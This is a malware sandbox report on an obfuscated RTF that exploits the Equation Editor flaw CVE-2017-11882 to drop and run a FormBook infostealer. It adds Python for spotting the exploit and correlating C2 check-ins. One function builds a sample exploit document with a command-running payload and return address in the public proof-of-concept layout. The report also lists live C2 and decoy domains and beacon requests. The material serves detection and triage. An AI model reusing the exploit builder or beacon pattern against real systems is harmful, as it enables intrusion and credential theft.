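    # Simplification: only the record sequence the public exploit uses is walked. FULL (0x0A)
    # and LINE (0x01) carry no payload here; FONT (0x08) is tag, tface, style, then a
    # NUL-terminated name, which is what overruns the stack buffer in EQNEDT32.EXE.
    while i < len(blob):
        tag = blob[i]
        if tag == 0x08:
            end = blob.find(b"\x00", i + 3)
            name = blob[i + 3 : end if end >= 0 else len(blob)]
            res["font_name"], res["font_name_len"] = name, len(name)
            break
        if tag not in (0x0A, 0x01):
            break
        i += 1
    return res


def is_cve_2017_11882_candidate(res: dict) -> bool:
    """An overlong FONT name or the WinExec return address inside an Equation object is enough."""
    return res["mtef_header"] and (res["font_name_len"] > FONT_NAME_BUF or res["winexec_ret"])


def build_sample_blob() -> bytes:
    """Constructed Equation object in the public PoC layout, carrying the command this report saw."""
    cmd = b"CmD.exe /C %tmp%\\Client.exe A C"
    font_name = cmd.ljust(44, b" ") + WINEXEC_RET        # 44 bytes of command, then the return address
    eqn_hdr = struct.pack("<I", 0x1C) + b"\x00" * 24     # 28-byte EQNOLEFILEHDR, cbHdr first
    return (CFB_MAGIC + b"\x00" * 8 + b"Microsoft Equation 3.0\x00"
            + b"Equation Native\x00" + eqn_hdr + MTEF_HDR
            + b"\x0a\x01\x08\x5a\x5a" + font_name + b"\x00")


def build_sample_rtf() -> bytes:
    """Constructed RTF wrapping the blob under \\objupdate, hex split by \\par like obfuscated samples."""
    hexdata = build_sample_blob().hex().encode()
    chunks = [hexdata[i : i + 48] for i in range(0, len(hexdata), 48)]
    return (b"{\\rtf1{\\object\\objemb\\objupdate{\\*\\objdata\r\n"
            + b"\\par\r\n".join(chunks) + b"}}}")


if __name__ == "__main__":
    rtf = build_sample_rtf()
    print(rtf_flags(rtf))
    for blob in objdata_blobs(rtf):
        res = scan_equation_object(blob)
        print(res, "CVE-2017-11882 candidate:", is_cve_2017_11882_candidate(res))
```

Note that the name length comes out at 47 rather than 48: the high byte of 0x00430C12 is the NUL that ends the copied string, which is one reason that particular address is used. On a real sample, point objdata_blobs at the file bytes; the decoded blob is an OLE compound file, and a proper triage would open it with an OLE parser and read the "Equation Native" stream rather than searching the raw bytes as this example does.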

          Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: Client.exe.0.dr
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\Client.exe
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 66.235.200.170:80
Source: global traffic | TCP traffic: 66.235.200.170:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 66.235.200.170:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 66.235.200.170:80
Source: global traffic | TCP traffic: 66.235.200.170:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 66.235.200.170:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 66.235.200.170:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 66.235.200.170:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 66.235.200.170:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 66.235.200.170:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 66.235.200.170:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 66.235.200.170:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 66.235.200.170:80
Source: global traffic | TCP traffic: 66.235.200.170:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 66.235.200.170:80
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 104.167.67.175:80
Source: global traffic | TCP traffic: 104.167.67.175:80 -> 192.168.2.22:49172
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 104.167.67.175:80
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 104.167.67.175:80
Source: global traffic | TCP traffic: 104.167.67.175:80 -> 192.168.2.22:49172
Source: global traffic | TCP traffic: 104.167.67.175:80 -> 192.168.2.22:49172
Source: global traffic | TCP traffic: 104.167.67.175:80 -> 192.168.2.22:49172
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 104.167.67.175:80
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 104.167.67.175:80
Source: global traffic | TCP traffic: 104.167.67.175:80 -> 192.168.2.22:49172
Source: global traffic | DNS query: name: www.thegoldencamel.online
Source: global traffic | DNS query: name: www.best-boy.net
Source: C:\Windows\SysWOW64\notepad.exe | Code function: 4x nop then pop ebx | 9_2_00407B44
Source: C:\Windows\SysWOW64\notepad.exe | Code function: 4x nop then pop ebx | 9_2_00407B1C
Source: C:\Windows\SysWOW64\notepad.exe | Code function: 4x nop then pop edi | 9_2_0040E47A
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 66.235.200.170:80
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 104.167.67.175:80

          Networking

Source: C:\Windows\explorer.exe | Domain query: www.best-boy.net
Source: C:\Windows\explorer.exe | Network Connect: 104.167.67.175 80
Source: C:\Windows\explorer.exe | Network Connect: 66.235.200.170 80
Source: C:\Windows\explorer.exe | Domain query: www.thegoldencamel.online
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 66.235.200.170:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 66.235.200.170:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 66.235.200.170:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 104.167.67.175:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 104.167.67.175:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 104.167.67.175:80
Source: Malware configuration extractor | URLs: www.lundadonate.xyz/nb30/
Source: global traffic | HTTP traffic detected: GET /nb30/?4hntpZ=HrFg7Zw77Q4AgN6xWDdwD99B0qzSSsTIjhXIVaLmDYdCsLEuJk5C8qRmA5PaAiVsBqYing==&PPa=ApcXW2 HTTP/1.1 | Host: www.thegoldencamel.online | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /nb30/?4hntpZ=WWLsvV61WazOGjhWPmK2zCox7nD1HU3ZrNfLe9lvYYokad8918qHb5Jmu9JsRIh/3onKEQ==&PPa=ApcXW2 HTTP/1.1 | Host: www.best-boy.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | ASN Name: ESITEDUS ESITEDUS
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
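
The two captured check-ins use the same path as the configured C2 (/nb30/) and the same two-parameter query shape, carry no User-Agent and close the connection, yet go to www.thegoldencamel.online and www.best-boy.net, both of which sit in the decoy list of the extracted configuration rather than in the C2 list. FormBook sends identical requests to decoy domains so that the real C2 does not stand out in traffic, which is why the Snort rules above fire on the request shape rather than on a host. The Python below is an added example written for this page, not Joe Sandbox code: it classifies each observed host against the extracted C2 and decoy lists and checks the request shape. The configuration is trimmed to the decoys actually contacted, the requests are the two from the report plus a constructed request to the configured C2 and a constructed benign control, and the request-shape heuristic is specific to this example, not the logic of the Snort rules.

```python
"""Correlate captured HTTP check-ins with the extracted FormBook configuration.

Added example for this report, not Joe Sandbox code. CONFIG is the extracted
configuration above trimmed to the decoys that were contacted; the first two
requests in OBSERVED are the ones the report captured, the last two are
constructed (a request to the configured C2 and a benign control request).
"""
import re
from urllib.parse import parse_qsl, urlsplit

CONFIG = {
    "C2 list": ["www.lundadonate.xyz/nb30/"],
    "decoy": ["thegoldencamel.online", "best-boy.net", "p5w.top"],  # subset of the 64 decoys
}

OBSERVED = [
    # captured in the report; the seven zero bytes are the "Data Raw" the report shows
    b"GET /nb30/?4hntpZ=HrFg7Zw77Q4AgN6xWDdwD99B0qzSSsTIjhXIVaLmDYdCsLEuJk5C8qRmA5PaAiVsBqYing==&PPa=ApcXW2 HTTP/1.1\r\n"
    b"Host: www.thegoldencamel.online\r\nConnection: close\r\n\r\n\x00\x00\x00\x00\x00\x00\x00",
    b"GET /nb30/?4hntpZ=WWLsvV61WazOGjhWPmK2zCox7nD1HU3ZrNfLe9lvYYokad8918qHb5Jmu9JsRIh/3onKEQ==&PPa=ApcXW2 HTTP/1.1\r\n"
    b"Host: www.best-boy.net\r\nConnection: close\r\n\r\n\x00\x00\x00\x00\x00\x00\x00",
    # constructed: the same shape sent to the configured C2 host
    b"GET /nb30/?4hntpZ=AAAA&PPa=ApcXW2 HTTP/1.1\r\nHost: www.lundadonate.xyz\r\nConnection: close\r\n\r\n",
    # constructed: an ordinary browser request used as a control
    b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: Mozilla/5.0\r\nConnection: keep-alive\r\n\r\n",
]


def parse_request(raw: bytes) -> dict:
    """Split a raw HTTP request into method, path, query parameters, headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {k.strip().lower(): v.strip()
               for k, v in (line.split(":", 1) for line in lines[1:] if ":" in line)}
    parts = urlsplit(target)
    return {"method": method, "path": parts.path, "query": dict(parse_qsl(parts.query)),
            "headers": headers, "host": headers.get("host", "").lower(), "body": body}


def strip_www(host: str) -> str:
    return re.sub(r"^www\.", "", host.lower())


def c2_hosts_paths(config: dict) -> dict:
    """Map each configured C2 host (without www.) to its check-in path."""
    out = {}
    for entry in config["C2 list"]:
        host, _, path = entry.partition("/")
        out[strip_www(host)] = "/" + path
    return out


def classify_host(host: str, config: dict) -> str:
    """'c2', 'decoy' or 'unknown' by membership in the extracted lists."""
    bare = strip_www(host)
    if bare in c2_hosts_paths(config):
        return "c2"
    if bare in {strip_www(d) for d in config["decoy"]}:
        return "decoy"
    return "unknown"


def looks_like_checkin(req: dict, config: dict) -> bool:
    """Request shape seen in this report: C2 path, two query parameters, no UA, Connection: close."""
    paths = set(c2_hosts_paths(config).values())
    return (req["method"] == "GET" and req["path"] in paths
            and len(req["query"]) == 2
            and "user-agent" not in req["headers"]
            and req["headers"].get("connection", "").lower() == "close")


def triage(raws=OBSERVED, config=CONFIG) -> list:
    """(host, classification, check-in shape) for every request."""
    rows = []
    for req in map(parse_request, raws):
        rows.append((req["host"], classify_host(req["host"], config), looks_like_checkin(req, config)))
    return rows


if __name__ == "__main__":
    for host, kind, checkin in triage():
        print(f"{host:<28} {kind:<8} checkin={checkin}")
```

The decoy rows are the operationally interesting ones: blocking only the configured C2 host leaves the beacon loop intact, so the path and request shape (or the Snort SIDs above) are the durable indicators, and the decoy domains themselves should not be treated as compromised infrastructure.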
Source: explorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://java.sun.com
Source: explorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 0000000A.00000000.957907821.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: Client.exe, 00000006.00000002.951081960.0000000002641000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000000A.00000000.973857047.0000000006450000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 0000000A.00000000.957907821.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 0000000A.00000000.979092097.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.962364346.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030297831.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012512071.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012445260.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012221961.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.979280066.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.996182777.0000000008617000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 0000000A.00000000.980217883.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012221961.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.996182777.0000000008617000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner1SPS0
Source: explorer.exe, 0000000A.00000000.996446358.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1011537608.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.995286555.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.996486805.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.980535513.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.980217883.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012512071.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012445260.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.979280066.00000000084D2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 0000000A.00000000.969152262.0000000004385000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerp
Source: explorer.exe, 0000000A.00000000.1004860034.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.988141924.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.962364346.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030297831.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerq
          Source: explorer.exe, 0000000A.00000000.969152262.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1007082449.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.991189675.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1032583619.0000000004385000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerv
          Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5E27A50A-FBC0-4F18-B35D-48F0F2347081}.tmpJump to behavior
          Source: unknownDNS traffic detected: queries for: www.thegoldencamel.online
          Source: global trafficHTTP traffic detected: GET /nb30/?4hntpZ=HrFg7Zw77Q4AgN6xWDdwD99B0qzSSsTIjhXIVaLmDYdCsLEuJk5C8qRmA5PaAiVsBqYing==&PPa=ApcXW2 HTTP/1.1Host: www.thegoldencamel.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nb30/?4hntpZ=WWLsvV61WazOGjhWPmK2zCox7nD1HU3ZrNfLe9lvYYokad8918qHb5Jmu9JsRIh/3onKEQ==&PPa=ApcXW2 HTTP/1.1Host: www.best-boy.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 08 Aug 2022 16:39:46 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <https://www.thegoldencamel.online/wp-json/>; rel="https://api.w.org/" | Vary: Accept-Encoding | X-Endurance-Cache-Level: 2 | X-nginx-cache: WordPress | CF-Cache-Status: MISS | Server: cloudflare | CF-RAY: 7379b09ee927997b-FRA
          Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Window created: window name: CLIPBRDWNDCLASS

          E-Banking Fraud

          Source: Yara match | File source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: ~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp.0.dr | Stream path '_1721489047/\x1Ole10Native' : ....Client.exe.C:\Path\Client.exe.........C:\Path\
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf, type: SAMPLE | Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
          Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
